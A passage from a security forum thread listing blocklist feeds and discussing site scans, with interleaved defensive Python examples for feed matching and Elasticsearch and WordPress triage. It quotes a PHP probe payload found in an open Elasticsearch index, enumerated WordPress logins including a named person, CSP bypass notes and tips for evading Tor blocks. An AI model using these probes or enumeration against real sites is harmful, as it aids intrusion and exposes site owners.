http://cybercrime-tracker.net/ccpmgate.php
http://danger.rulez.sk/projects/bruteforceblocker/blist.php
http://data.netlab.360.com/feeds/dga/dga.txt
http://data.netlab.360.com/feeds/ek/magnitude.txt
http://data.netlab.360.com/feeds/ek/neutrino.txt
http://data.netlab.360.com/feeds/mirai-scanner/scanner.list
http://data.phishtank.com/data/online-valid.csv
http://dns-bh.sagadc.org/dynamic_dns.txt
http://feeds.dshield.org/top10-2.txt
http://hosts-file.net/?s=Browse&f=2014
http://labs.snort.org/feeds/ip-filter.blf
http://labs.sucuri.net/?malware
http://lists.blocklist.de/lists/all.txt
http://malc0de.com/bl/BOOT
http://malc0de.com/bl/IP_Blacklist.txt
http://malc0de.com/rss/
http://malwaredb.malekal.com/
http://malwaredomains.lehigh.edu/files/domains.txt
http://malwareurls.joxeankoret.com/normal.txt
http://mirror2.malwaredomains.com/files/immortal_domains.txt
http://mirror2.malwaredomains.com/files/justdomains
http://multiproxy.org/txt_all/proxy.txt
http://openphish.com/feed.txt
http://osint.bambenekconsulting.com/feeds/c2-dommasterlist-high.txt
http://osint.bambenekconsulting.com/feeds/c2-dommasterlist.txt
http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist-high.txt
http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist.txt
http://osint.bambenekconsulting.com/feeds/c2-masterlist.txt
http://osint.bambenekconsulting.com/feeds/dga-feed.txt
http://ransomwaretracker.abuse.ch
http://report.rutgers.edu/DROP/attackers
http://reputation.alienvault.com/reputation.data
http://rules.emergingthreats.net/blockrules/emerging-ciarmy.rules
http://rules.emergingthreats.net/blockrules/emerging-compromised.rules
http://rules.emergingthreats.net/fwrules/emerging-PF-CC.rules
http://rules.emergingthreats.net/open/suricata/rules/botcc.rules
http://rules.emergingthreats.net/open/suricata/rules/compromised-ips.txt
http://sblam.com/blacklist.txt
http://support.clean-mx.de/clean-mx/xmlviruses.php
http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv
http://tracker.h3x.eu/api/sites_1day.php
http://virbl.org/download/virbl.dnsbl.bit.nl.txt
http://vmx.yourcmc.ru/BAD_HOSTS.IP4
http://vxvault.net/URL_List.php
http://vxvault.siri-urz.net/URL_List.php
http://vxvault.siri-urz.net/ViriList.php
http://www.autoshun.org/files/shunlist.csv
http://www.blocklist.de/lists/apache.txt
http://www.blocklist.de/lists/asterisk.txt
http://www.blocklist.de/lists/bots.txt
http://www.blocklist.de/lists/courierimap.txt
http://www.blocklist.de/lists/courierpop3.txt
http://www.blocklist.de/lists/email.txt
http://www.blocklist.de/lists/ftp.txt
http://www.blocklist.de/lists/imap.txt
http://www.blocklist.de/lists/ircbot.txt
http://www.blocklist.de/lists/pop3.txt
http://www.blocklist.de/lists/postfix.txt
http://www.blocklist.de/lists/proftpd.txt
http://www.blocklist.de/lists/sip.txt
http://www.blocklist.de/lists/ssh.txt
http://www.botvrij.eu/data/ioclist.url
http://www.ciarmy.com/list/ci-badguys.txt
http://www.dshield.org/ipsascii.html?limit=10000
http://www.falconcrest.eu/IPBL.aspx
http://www.joewein.net/dl/bl/dom-bl-base.txt
http://www.joewein.net/dl/bl/dom-bl.txt
http://www.malware-traffic-analysis.net
http://www.malwareblacklist.com/showAllMalwareURL.php?userName=Guest&sessionID=&downloadOption=0
http://www.malwaredomainlist.com/hostslist/ip.txt
http://www.malwaredomainlist.com/updatescsv.php
http://www.malwaregroup.com/ipaddresses
http://www.michaelbrentecklund.com/whm-cpanel-cphulk-banlist-whm-cpanel-cphulk-blacklist/
http://www.mirc.com/servers.ini
http://www.nothink.org/blacklist/blacklist_malware_dns.txt
http://www.nothink.org/blacklist/blacklist_malware_http.txt
http://www.nothink.org/blacklist/blacklist_malware_irc.txt
http://www.nothink.org/blacklist/blacklist_snmp_2015.txt
http://www.nothink.org/blacklist/blacklist_ssh_day.txt
http://www.projecthoneypot.org/list_of_ips.php
http://www.spamhaus.org/drop/drop.txt
http://www.spamhaus.org/drop/edrop.txt
http://www.stopforumspam.com/downloads/listed_ip_1_all.zip
http://www.stopforumspam.com/downloads/toxic_ip_cidr.txt
http://www.urlvir.com/export-hosts/
http://www.voipbl.org/update/
https://atlas.arbor.net/summary/domainlist
https://dataplane.org/sshclient.txt
https://dataplane.org/sshpwauth.txt
https://disconnect.me/lists/malvertising
https://disconnect.me/lists/malwarefilter
https://dragonresearchgroup.org/insight/sshpwauth.txt
https://dragonresearchgroup.org/insight/vncprobe.txt
https://feodotracker.abuse.ch
https://github.com/stamparm/maltrail/blob/master/trails/static/mass_scanner.txt
https://gitlab.com/ZeroDot1/CoinBlockerLists/blob/master/list.txt
https://isc.sans.edu/feeds/daily_sources
https://isc.sans.edu/feeds/suspiciousdomains_High.txt
https://isc.sans.edu/feeds/suspiciousdomains_Low.txt
https://isc.sans.edu/feeds/suspiciousdomains_Medium.txt
https://isc.sans.edu/feeds/topips.txt
https://isc.sans.edu/ipsascii.html
https://lists.malwarepatrol.net/cgi/getfile?receipt=f1417692233&product=8&list=dansguardian
https://malc0de.com/bl/ZONES
https://malsilo.gitlab.io/feeds/dumps/url_list.txt
https://malwared.malwaremustdie.org/rss.php
https://malwared.malwaremustdie.org/rss_bin.php
https://malwared.malwaremustdie.org/rss_ssh.php
https://myip.ms/files/blacklist/htaccess/latest_blacklist.txt
https://onionoo.torproject.org/details?type=relay&running=true
https://palevotracker.abuse.ch
https://paste.cryptolaemus.com/feed.xml
https://raw.githubusercontent.com/botherder/targetedthreats/master/targetedthreats.csv
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/bitcoin_nodes_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/botscout_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/cruzit_web_attacks.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malwaredomainlist.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxylists_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxyrss_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxyspy_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/ri_web_proxies_30d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/socks_proxy_7d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/sslproxies_1d.ipset
https://raw.githubusercontent.com/futpib/policeman-rulesets/master/examples/simple_domains_blacklist.txt
https://raw.githubusercontent.com/Neo23x0/signature-base/master/iocs/otx-c2-iocs.txt
https://rules.emergingthreats.net/open/suricata/rules/emerging-dns.rules
https://secure.dshield.org/ipsascii.html?limit=1000
https://sslbl.abuse.ch
https://techhelplist.com/maltlqr/reports/dyreza.txt
https://techhelplist.com/pastes
https://techhelplist.com/spam-list
https://threatfeeds.io/
https://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv
https://urlhaus.abuse.ch/downloads/csv/
https://www.badips.com/get/list/any/2?age=7d
https://www.circl.lu/doc/misp/feed-osint/
https://www.dan.me.uk/torlist/
https://www.hidemyass.com/vpn-config/l2tp/
https://www.malwaredomainlist.com/hostslist/hosts.txt
https://www.maxmind.com/en/anonymous_proxies
https://www.maxmind.com/en/high-risk-ip-sample-list
https://www.openbl.org/lists/base.txt
https://www.openbl.org/lists/base_all_ftp-only.txt
https://www.openbl.org/lists/base_all_http-only.txt
https://www.openbl.org/lists/base_all_smtp-only.txt
https://www.openbl.org/lists/base_all_ssh-only.txt
https://www.packetmail.net/iprep.txt
https://www.packetmail.net/iprep_CARISIRT.txt
https://www.packetmail.net/iprep_ramnode.txt
https://www.trustedsec.com/banlist.txt
https://www.turris.cz/greylist-data/greylist-latest.csv
https://zeustracker.abuse.ch


Also interesting (example): https://firewallban.dynu.net/search.php?submit=Search&search=2.57.122.96

Search engine to search for script snippet examples: https://publicwww.com/?q=

enjoy, my good friends, enjoy and have a good week,

polonus
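Added example (not part of the post above and not covert.io's code): the feeds listed come in several shapes (Spamhaus DROP is CIDR plus a comment, blocklist.de is one IP per line, URLhaus is a quoted CSV), so the first job is normalising them into one indicator set and then matching log lines against it, with CIDR containment rather than string equality. The feed contents and log lines below are constructed samples in the shape of those formats, not downloaded data.

```python
import csv
import io
import ipaddress
import re

# Constructed samples in the shape of three feed formats from the list above
# (not downloaded data): Spamhaus DROP (CIDR + comment), blocklist.de (one IP
# per line) and the URLhaus CSV export.
DROP_TXT = """; Spamhaus DROP List (constructed sample)
; Last-Modified: Fri, 20 Nov 2020 10:00:00 GMT
203.0.113.0/24 ; SBL000001
198.51.100.0/25 ; SBL000002
"""
BLOCKLIST_TXT = """# blocklist.de style (constructed sample)
192.0.2.10
192.0.2.11
"""
URLHAUS_CSV = """# id,dateadded,url,url_status,threat,tags,urlhaus_link,reporter
"1","2020-11-20 12:00:00","http://malicious.example/payload.exe","online","malware_download","exe","https://urlhaus.abuse.ch/url/1/","anon"
"""


def _data_lines(text):
    return [ln for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith(("#", ";"))]


def parse_feed(text: str, fmt: str) -> dict:
    """Normalise one feed into {'nets': [...], 'ips': set(), 'domains': set()}."""
    ind = {"nets": [], "ips": set(), "domains": set()}
    lines = _data_lines(text)
    if fmt == "cidr":            # 'net/prefix ; SBLnnn'
        for ln in lines:
            ind["nets"].append(ipaddress.ip_network(ln.split(";")[0].strip(), strict=False))
    elif fmt == "ip":            # one address per line
        for ln in lines:
            ind["ips"].add(ipaddress.ip_address(ln.strip()))
    elif fmt == "urlhaus":       # quoted CSV, URL in the third column
        for row in csv.reader(io.StringIO("\n".join(lines))):
            host = re.match(r"https?://([^/:?#]+)", row[2])
            if host:
                ind["domains"].add(host.group(1).lower())
    else:
        raise ValueError(f"unknown feed format {fmt!r}")
    return ind


def merge(*feeds) -> dict:
    out = {"nets": [], "ips": set(), "domains": set()}
    for f in feeds:
        out["nets"].extend(f["nets"])
        out["ips"] |= f["ips"]
        out["domains"] |= f["domains"]
    return out


def match_ip(ip: str, ind: dict):
    """Return 'ip', 'net:<cidr>' or None; exact hits beat CIDR hits."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:           # the regex can pick up things like 999.1.1.1
        return None
    if addr in ind["ips"]:
        return "ip"
    for net in ind["nets"]:
        if addr in net:
            return f"net:{net}"
    return None


IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"https?://([^/\s:?#]+)")


def scan_line(line: str, ind: dict) -> list:
    """List (value, reason) for every listed IP or URL host in one log line."""
    hits = []
    for ip in IP_RE.findall(line):
        why = match_ip(ip, ind)
        if why:
            hits.append((ip, why))
    for host in HOST_RE.findall(line):
        if host.lower() in ind["domains"]:
            hits.append((host, "domain"))
    return hits


# Constructed log lines (proxy and sshd style) to run the indicators over.
LOG_LINES = [
    "2020-11-22T00:01:02Z proxy 10.0.0.5 GET http://malicious.example/payload.exe 200",
    "2020-11-22T00:01:05Z proxy 10.0.0.7 GET http://example.org/ 200",
    "2020-11-22T00:02:10Z sshd Failed password for root from 203.0.113.77 port 51122",
    "2020-11-22T00:02:11Z sshd Accepted publickey for ops from 192.0.2.10 port 40000",
]

INDICATORS = merge(parse_feed(DROP_TXT, "cidr"),
                   parse_feed(BLOCKLIST_TXT, "ip"),
                   parse_feed(URLHAUS_CSV, "urlhaus"))

if __name__ == "__main__":
    for n, line in enumerate(LOG_LINES, 1):
        for value, why in scan_line(line, INDICATORS):
            print(f"line {n}: {value} ({why})")
```

Two things a practitioner will want on top of this: a per-feed source tag on every indicator, so a hit can be traced back to the list that produced it, and an age check, since many of the URLs in the list above are years old and a stale feed mostly generates false positives.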

Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2020, 12:28:35 PM
L.S.

If your origin servers are exposed, attackers can attack them directly and bypass any sort of protection you may have. Many large CDN companies have bad design which allows for serious security vulnerabilities.

Check website here: https://bitmitigate.com/origin-exposure-test.html?name=

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2020, 12:03:11 AM
Check your access control to guarantee a secure connection between the website and the web server behind it. Or you could find yourself in such a situation, where you find direct access to

Quote
{"099.php":{"aliases":{},"mappings":{},"settings":{"index":{"creation_date":"1606435124551","uuid":"BJaLkowESMCNLZr4WAlEHg","number_of_replicas":"1","number_of_shards":"5","version":{"created":"2030399"},"ajax":"true&a=Php&p1=die(@md5(S3pt3mb3r));"}},"warmers":{}}}
from a particular Rackspace IP address ending in /099.php ...
(weak PHP example found with Shodan.io)

A scan with the webbug tool produces this information:
Quote
HTTP/1.1 200 OK
Date: Wed, 02 Dec 2020 04:00:05 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 320
Access-Control-Allow-Origin: *
Connection: close

{
  "name" : "Super Sabre",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "2.3.3",
    "build_hash" : "218bdf10790eef486ff2c41a3df5cfa32dadcfde",
    "build_timestamp" : "2016-05-17T15:40:04Z",
    "build_snapshot" : false,
    "lucene_version" : "5.5.0"
  },
  "tagline" : "You Know, for Search"
}

Attackers may use various special search methods on Google (so-called dorks) and queries on shodan.io to find low-hanging fruit on the Interwebz to compromise, and worse.
Be the first party to scan, as malcreants may already have scanned you.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
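Added example (not part of the post above and not the "webbug" tool's code): how to triage a response like the one quoted, namely confirm it is an Elasticsearch root endpoint answering without authentication, check the version against a support cut-off, flag the CORS wildcard, and then look at the index listing for the kind of entry shown (an index named like a PHP file with a PHP payload in its settings, which usually means automated probes have already been writing to the cluster). RAW_RESPONSE is a constructed sample in the shape of the quoted banner; INDICES_JSON is the listing from the post. The MIN_SUPPORTED cut-off is an assumption for the example.

```python
import json

# Constructed sample in the shape of the response quoted above: the
# Elasticsearch root endpoint answering anonymously, with a CORS wildcard.
RAW_RESPONSE = """HTTP/1.1 200 OK
Date: Wed, 02 Dec 2020 04:00:05 GMT
Content-Type: application/json; charset=UTF-8
Access-Control-Allow-Origin: *
Connection: close

{
  "name" : "Super Sabre",
  "cluster_name" : "elasticsearch",
  "version" : { "number" : "2.3.3", "lucene_version" : "5.5.0" },
  "tagline" : "You Know, for Search"
}
"""

# The index listing quoted in the post, verbatim.
INDICES_JSON = ('{"099.php":{"aliases":{},"mappings":{},"settings":{"index":{'
                '"creation_date":"1606435124551","uuid":"BJaLkowESMCNLZr4WAlEHg",'
                '"number_of_replicas":"1","number_of_shards":"5","version":{"created":"2030399"},'
                '"ajax":"true&a=Php&p1=die(@md5(S3pt3mb3r));"}},"warmers":{}}}')

# Assumption for this example: Elasticsearch 2.x and 5.x are long out of
# support, so anything below 6.x is reported as unsupported.
MIN_SUPPORTED = (6, 0, 0)
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx")
CODE_MARKERS = ("<?php", "eval(", "die(", "md5(", "system(", "base64_decode(")


def split_response(raw: str):
    """Split a raw HTTP/1.1 response into (status line, {header: value}, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status, *header_lines = head.splitlines()
    headers = {}
    for h in header_lines:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    return status, headers, body


def triage_banner(raw: str) -> list:
    """Findings from the root endpoint response of a suspected open ES node."""
    status, headers, body = split_response(raw)
    findings = []
    if " 200 " not in status:
        return findings
    try:
        info = json.loads(body)
    except json.JSONDecodeError:
        return findings
    if info.get("tagline") == "You Know, for Search":
        findings.append("root endpoint answers anonymously: cluster "
                        f"'{info.get('cluster_name')}' needs no authentication")
    number = info.get("version", {}).get("number", "")
    parts = tuple(int(x) for x in number.split(".") if x.isdigit())
    if parts and parts < MIN_SUPPORTED:
        findings.append(f"unsupported Elasticsearch {number}")
    if headers.get("access-control-allow-origin") == "*":
        findings.append("CORS wildcard: any web origin can read responses")
    return findings


def suspicious_indices(indices_json: str) -> list:
    """Flag index names shaped like web scripts and settings that carry code."""
    flagged = []
    for name, meta in json.loads(indices_json).items():
        reasons = []
        if name.lower().endswith(SCRIPT_EXT):
            reasons.append("index name looks like a web script")
        blob = json.dumps(meta.get("settings", {}))
        if any(marker in blob for marker in CODE_MARKERS):
            reasons.append("code fragment stored in index settings")
        if reasons:
            flagged.append((name, reasons))
    return flagged


if __name__ == "__main__":
    for f in triage_banner(RAW_RESPONSE):
        print("-", f)
    for name, reasons in suspicious_indices(INDICES_JSON):
        print(f"- index {name}: {'; '.join(reasons)}")
```

The fix on the server side is the obvious one: bind Elasticsearch to a private interface, put authentication in front of it, and drop the wildcard CORS header; the index listing is worth keeping as evidence of who got there first.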
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2020, 02:06:03 PM
Another fine resource site lost to us?

Not to be reached - isithacked.com - a scan site to look at signs of cloaking, spammy links etc.
Has it now also been discontinued? Re: https://mxtoolbox.com/SuperTool.aspx?action=mx%3aisithacked.com&run=toolpage
Re: https://sitereport.netcraft.com/?url=http%3A%2F%2Fwww.isithacked.com
https://www.virustotal.com/gui/ip-address/107.170.38.188/relations

What happened at the hoster, DigitalOcean? Anyone?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2020, 03:12:51 PM
Improving DNS Privacy with Oblivious DNS:
https://blog.cloudflare.com/oblivious-dns/


polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2020, 04:25:23 PM
Time to test the security of your WordPress CMS here: https://hackertarget.com/wordpress-security-scan/
or scan with Sucuri's. Look for outdated plug-in software, as attackers abuse domains there to spread malware:
https://blog.sucuri.net/2020/12/the-dangers-of-using-abandoned-plugins-themes.html  (info credits: Krasimir Kronov).

Remote code execution / file upload leak in WordPress plugin Contact Form 7 [CVE-2020-35489],
read: https://contactform7.com/2020/12/17/contact-form-7-532/
Site of researcher that found it: https://www.jinsonvarghese.com/
Astra-site: https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 30, 2020, 02:45:36 PM
WordPress is found on 40% of websites; WordPress is a PHP-based CMS.

Check PHP using Snyk:
Re: https://snyk.io/vuln/npm:php_codesniffer_master
& https://support.snyk.io/hc/en-us/articles/360003817397-Snyk-for-PHP

Browser extension: the Vulners web scanner alerts to vulnerabilities.
PHP Vulners database: https://vulners.com/php

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 31, 2020, 06:28:14 PM
Then it is a pity this website failed a low impact test: -https://code313detroit.org/

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

Plugin                     Update Status   About
js_composer                Unknown
nd-shortcodes              Unknown         latest release (6.3) https://nicdark.com
nd-projects                Unknown         latest release (1.3) https://nicdark.com
contact-form-7             Unknown         latest release (5.3.2) https://contactform7.com/
revslider                  Unknown
woocommerce 3.0.7          Warning         latest release (4.8.0) https://woocommerce.com/
slider-revolution 6.2.2    Unknown
nd-donations               Unknown         latest release (1.7) https://nicdark.com
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

There are likely more plugins installed than those listed here as the detection method used here is passive. While these results give an indication of the status of plugin updates, a more comprehensive assessment should be undertaken by brute forcing the plugin paths  using a dedicated tool.

User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   code313   code313
ID: 2   garybeaver   Gary Beaver
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

However, it has been given a clean bill by:
DShield    CLEAN
AlienVault OTX    CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

Bad for our future coders; big names for charity should do a better job in leadership. Hey Google, Amazon, Verizon, Microsoft?
A very happy and healthy New Year 2021 to you all, wishes,

Damian aka polonus
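Added example (not part of the post above and not the hackertarget scanner's code): the passive plugin detection the scanner describes, done by reading the front page's HTML for /wp-content/plugins/<slug>/ asset links and their ?ver= query strings, compared against a latest-release table, plus the author-ID redirect check behind the user enumeration result. SAMPLE_HTML is a constructed page fragment (no real site), and LATEST is a constructed table that reuses the two release numbers printed in the scan above.

```python
import re
from html.parser import HTMLParser


class _AssetCollector(HTMLParser):
    """Collect every src/href value from the page, whatever the tag."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for key, value in attrs:
            if key in ("src", "href") and value:
                self.urls.append(value)


PLUGIN_RE = re.compile(r"/wp-content/plugins/([A-Za-z0-9_.-]+)/")
VER_RE = re.compile(r"[?&]ver=([0-9][0-9A-Za-z.-]*)")


def vtuple(version: str) -> tuple:
    """'5.3.2' -> (5, 3, 2); non-numeric parts count as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.-]", version))


def detect_plugins(html: str) -> dict:
    """Passive detection from the front page: {slug: version or None}.
    The ?ver= query string is only a hint: some plugins tag assets with the
    WordPress core version instead of their own, so the highest value seen wins
    and the result still needs confirming against the plugin's readme."""
    collector = _AssetCollector()
    collector.feed(html)
    found = {}
    for url in collector.urls:
        m = PLUGIN_RE.search(url)
        if not m:
            continue
        slug = m.group(1)
        v = VER_RE.search(url)
        ver = v.group(1) if v else None
        current = found.get(slug)
        if slug not in found or (ver and (current is None or vtuple(ver) > vtuple(current))):
            found[slug] = ver
    return found


def outdated(detected: dict, latest: dict) -> list:
    """(slug, seen, latest) for every plugin whose seen version is behind."""
    return sorted((slug, ver, latest[slug]) for slug, ver in detected.items()
                  if ver and slug in latest and vtuple(ver) < vtuple(latest[slug]))


def author_from_redirect(location: str):
    """User enumeration check: WordPress answers /?author=N with a redirect to
    /author/<login>/ when that ID exists. Returns the login slug, or None."""
    m = re.search(r"/author/([^/?#]+)", location)
    return m.group(1) if m else None


# Constructed front-page fragment (no real site) and a constructed
# latest-release table using the two numbers the scanner printed above.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://site.example/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1">
<script src="https://site.example/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.0.7"></script>
<script src="https://site.example/wp-content/plugins/revslider/public/assets/js/rs6.min.js"></script>
<link rel="stylesheet" href="https://site.example/wp-content/themes/shop/style.css?ver=5.6">
</head><body></body></html>"""
LATEST = {"contact-form-7": "5.3.2", "woocommerce": "4.8.0"}

if __name__ == "__main__":
    seen = detect_plugins(SAMPLE_HTML)
    print("detected:", seen)
    for slug, ver, new in outdated(seen, LATEST):
        print(f"  {slug} {ver} -> latest release ({new})")
    print("author id 1 ->", author_from_redirect("https://site.example/author/editor/"))
```

Because this is passive, a plugin that loads no asset on the front page stays invisible, which is the "there are likely more plugins installed" caveat in the scan output; the author redirect is the same story in reverse, since a site that answers /?author=1 with a 404 or a redirect to the home page gives nothing away.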
Title: Re: Tests and other Media topics
Post by: polonus on January 04, 2021, 03:52:34 PM
Is this analyzer trustworthy: https://www.easycounter.com/report/pamcdn.avast.com ?

Does this work: https://sur.ly/web-safety-tools (as a Google extension)?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 18, 2021, 10:08:38 PM
Another real time website privacy inspector:
https://themarkup.org/blacklight

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 24, 2021, 05:59:38 PM
Compromise here is not that difficult -  :o

Malcode reported here: https://urlhaus.abuse.ch/url/976418/   reported ELF; Mozi malware spreader.
Where: https://www.shodan.io/host/60.176.252.134

That is China Telecom on an SDK 4.3.0.0 UPnP/1.0 MiniUPnPd/1.6 server.

Discovery and PoC http://github.pannier.org/simpletr64/html/discover.html
delivering ->
Quote
.shstrtab.init.text.fini.rodata.ARM.extab.ARM.exidx.eh_frame.tbss.init_array.fini_array.data.rel.ro.got.data.bss.ARM.attributes

Just the one engine to detect: https://www.virustotal.com/gui/url/e5550612ad7a10ae39ace25e46801decc4c369255eff100154b2b50b27950e69/detection

Nothing here: https://www.virustotal.com/gui/ip-address/60.176.252.134/detection
(so not unlocked a perk point through ARM attribute hack :P )

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 26, 2021, 09:56:12 PM
Test for modern Internet Standards:
For our forum see: https://www.internet.nl/site/forum.avast.com/1098593/

Test results only 50% of total reached.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on January 26, 2021, 10:23:40 PM
Test for modern Internet Standards:
For our forum see: https://www.internet.nl/site/forum.avast.com/1098593/

Test results only 50% of total reached.

polonus
Does that explain all the spammers?
Title: Re: Tests and other Media topics
Post by: polonus on February 09, 2021, 10:19:07 PM
@ bob3160,

Partly it does explain this situation.

On the other hand it is also because the following lore is getting harder and harder to put into practice,
that is staying more or less anonymous on the Interwebz.

Read about this from fravia's legacy: http://www.darkridge.com/~jpr5/mirror/fravia.org/noanon.htm

It explains a lot of things we almost cannot escape from today, as was still possible before the year 2001 (1999 in fact).

Here is a listing of services that block Tor users from going to and visiting certain websites and services (shodan.io)
using a Tor browser, read: https://gitlab.torproject.org/legacy/trac/-/wikis/org/doc/ListOfServicesBlockingTor

You see a lot of CDNs mentioned (Cloudflare domains and the like) and even Internet providers, particularly
lists from blocklist developers etc.

In case your provider is blocking Tor, one could use certain "bridges/mosti".

Other ways to circumvent are particular URI code scans to see the website in HTML code.

Then also through using the Archive Wayback Machine, Archive dot fo, Google cache, Startpage dot com,
searx dot me, hypothes dot is, and various online proxies.

To evade captchas on YouTube use hooktube dot com.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2021, 01:59:05 PM
See how we are being tracked through Amazon CloudFront,
see: https://urlscan.io/domain/gdpr-consent-tool.privacymanager.io
Example:
Re: https://sitecheck.sucuri.net/results/Mediacourant.nl
WordPress issue:
Quote
  User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   admin   
ID: 2   not found   
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.


Re: https://webcookies.org/cookies/mediacourant.nl/31205635?589950#headers
Re: Google Chrome returned code 301 to -https://www.mediacourant.nl/
GoogleBot returned code 301 to -https://www.mediacourant.nl/

Re: https://www.virustotal.com/gui/ip-address/52.84.52.106/relations (and related communicating files detected).

And a specific tracking report: https://whotracks.me/trackers/amazon_cloudfront.html
36% tracking and 8% ads found on AWS CDN aws dot amazon dot com.
Elements from -www.google.com ; -fonts.gstatic.com ; -amazonwebservicesinc.tt.omtrdc.net & -www.youtube-nocookie.com

This website is secured
100% of the trackers on this site are helping protect you from NSA snooping. Why not thank amazon.com for being secure?

Identifiers | All Trackers
 Secure Identifiers
Unique IDs about your web browsing habits have been securely sent to third parties.

 -Amazon dot coms_fid
209=mzr8wotm-vqvumv3lffmgwidgp5napj9u2505afonoqnv2vXXXXXXXXXXtzibackbrkimvktwejl9xgubrrxsk13g_jphcqisc1kxkiy1a-nps5kfn2weqg3vxucp8u6ynrrndbukqkaXXXXXXXXXXalaa6y3wv3nkrfejxj8 wXw.google.comnid (XXX by me for obvious reasons)


polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2021, 04:37:38 PM
Another of these tracking surveys for a particular website. Browser console info ->
Quote
CSP errors

[check] default-src

[error] script-src
  [help_outline] 'self'
    'self' can be problematic if you host JSONP, Angular or user uploaded files.
  [help_outline] https://cdn.polyfill.io
    No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
  [help_outline] https://connect.facebook.net
    No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
  [error] http://www.google-analytics.com
    Allow only resources downloaded over HTTPS.
    No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
  [error] https://www.google.com
    www.google.com is known to host JSONP endpoints which allow to bypass this CSP.
  [error] https://www.gstatic.com
    www.gstatic.com is known to host Angular libraries which allow to bypass this CSP.
  [error] http://static.ads-twitter.com
    Allow only resources downloaded over HTTPS.
    No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
  [help_outline] https://analytics.twitter.com
    No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
  [info_outline] 'nonce-**CSP_NONCE**'
    Nonces should only use the base64 charset.
  [error] data:
    data: URI in script-src allows the execution of unsafe scripts.

[check] connect-src

[check] frame-src

[error] img-src
  [check] 'self'
  [check] *.blockchain.com
  [check] *.blockchain.info
  [check] data:
  [check] *.cryptocompare.com
  [check] *.googleusercontent.com
  [check] https://www.facebook.com
  [error] http://www.google-analytics.com
    Allow only resources downloaded over HTTPS.
  [check] https://www.google.com
  [error] http://t.co/i/adsct
    Allow only resources downloaded over HTTPS.
Website is insecure by default
100% of the trackers on this site could be protecting you from NSA snooping. Tell blockchain.com to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

d17fa83ec3d5590b861c1273eee8795121613819917 www.blockchain.com__cfduid

HTTP security headers (name / value / setting secure)

content-security-policy:
